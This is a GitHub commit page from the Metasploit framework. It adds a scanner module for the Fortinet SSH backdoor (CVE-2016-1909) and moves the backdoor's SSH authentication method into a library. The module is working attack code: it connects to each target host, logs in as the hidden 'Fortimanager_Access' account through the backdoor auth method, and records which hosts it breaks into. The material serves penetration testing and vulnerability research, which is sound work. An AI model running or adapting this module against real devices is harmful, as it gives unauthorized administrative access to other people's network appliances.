Skip to content

Commit

Permalink
Move Fortinet backdoor to module and library
Browse files Browse the repository at this point in the history
  • Loading branch information
wvu committed Feb 29, 2016
1 parent 83fad3e commit 300fdc8
Show file tree
Hide file tree
Showing 3 changed files with 82 additions and 1 deletion.
Original file line number Diff line number Diff line change
Expand Up @@ -2,6 +2,8 @@

# https://www.ietf.org/rfc/rfc4256.txt

require 'net/ssh'

class Net::SSH::Authentication::Methods::FortinetBackdoor < Net::SSH::Authentication::Methods::Abstract

USERAUTH_INFO_REQUEST = 60
Expand Down
1 change: 0 additions & 1 deletion lib/net/ssh/authentication/session.rb
Original file line number Diff line number Diff line change
Expand Up @@ -7,7 +7,6 @@
require 'net/ssh/authentication/methods/hostbased'
require 'net/ssh/authentication/methods/password'
require 'net/ssh/authentication/methods/keyboard_interactive'
require 'net/ssh/authentication/methods/fortinet_backdoor'

module Net; module SSH; module Authentication

Expand Down
80 changes: 80 additions & 0 deletions modules/auxiliary/scanner/ssh/fortinet_backdoor.rb
Original file line number Diff line number Diff line change
@@ -0,0 +1,80 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core/exploit/fortinet'

class Metasploit4 < Msf::Auxiliary

include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report

def initialize(info = {})
super(update_info(info,
'Name' => 'Fortinet SSH Backdoor Scanner',
'Description' => %q{
This module scans for the Fortinet SSH backdoor.
},
'Author' => [
'operator8203 <operator8203[at]runbox.com>', # PoC
'wvu' # Module
],
'References' => [
['CVE', '2016-1909'],
['EDB', '39224'],
['PACKETSTORM', '135225'],
['URL', 'http://seclists.org/fulldisclosure/2016/Jan/26'],
['URL', 'https://blog.fortinet.com/post/brief-statement-regarding-issues-found-with-fortios']
],
'DisclosureDate' => 'Jan 09 2016',
'License' => MSF_LICENSE
))

register_options([
Opt::RPORT(22)
])

register_advanced_options([
OptBool.new('SSH_DEBUG', [false, 'SSH debugging', false]),
OptInt.new('SSH_TIMEOUT', [false, 'SSH timeout', 10])
])
end

def run_host(ip)
ssh_opts = {
port: datastore['RPORT'],
auth_methods: ['fortinet-backdoor']
}

ssh_opts.merge!(verbose: :debug) if datastore['SSH_DEBUG']

begin
ssh = Timeout.timeout(datastore['SSH_TIMEOUT']) do
Net::SSH.start(
ip,
'Fortimanager_Access',
ssh_opts
)
end
rescue Net::SSH::Exception => e
vprint_error("#{ip}:#{rport} - #{e.class}: #{e.message}")
return
end

if ssh
print_good("#{ip}:#{rport} - Logged in as Fortimanager_Access")
report_vuln(
:host => ip,
:name => self.name,
:refs => self.references,
:info => ssh.transport.server_version.version
)
end
end

def rport
datastore['RPORT']
end

end

0 comments on commit 300fdc8

Please sign in to comment.